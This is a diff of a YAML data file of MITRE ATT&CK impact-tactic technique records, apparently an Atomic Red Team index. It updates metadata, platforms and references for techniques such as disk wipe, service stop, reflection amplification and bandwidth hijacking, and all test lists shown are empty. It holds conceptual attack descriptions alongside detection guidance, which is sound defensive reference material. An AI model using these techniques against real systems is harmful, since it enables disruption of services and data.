+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -57603,13 +58360,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -57617,12 +58381,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -57683,109 +58468,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -57794,10 +58549,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -57808,39 +58567,37 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests: []
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -57858,13 +58615,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57872,36 +58636,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -57910,11 +58665,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -57923,17 +58684,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -57942,6 +58717,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -57957,17 +58733,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -57977,14 +58748,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -57993,28 +58765,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -58025,7 +58797,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -58036,17 +58807,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -58083,7 +58849,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -58104,7 +58871,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -58131,12 +58898,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
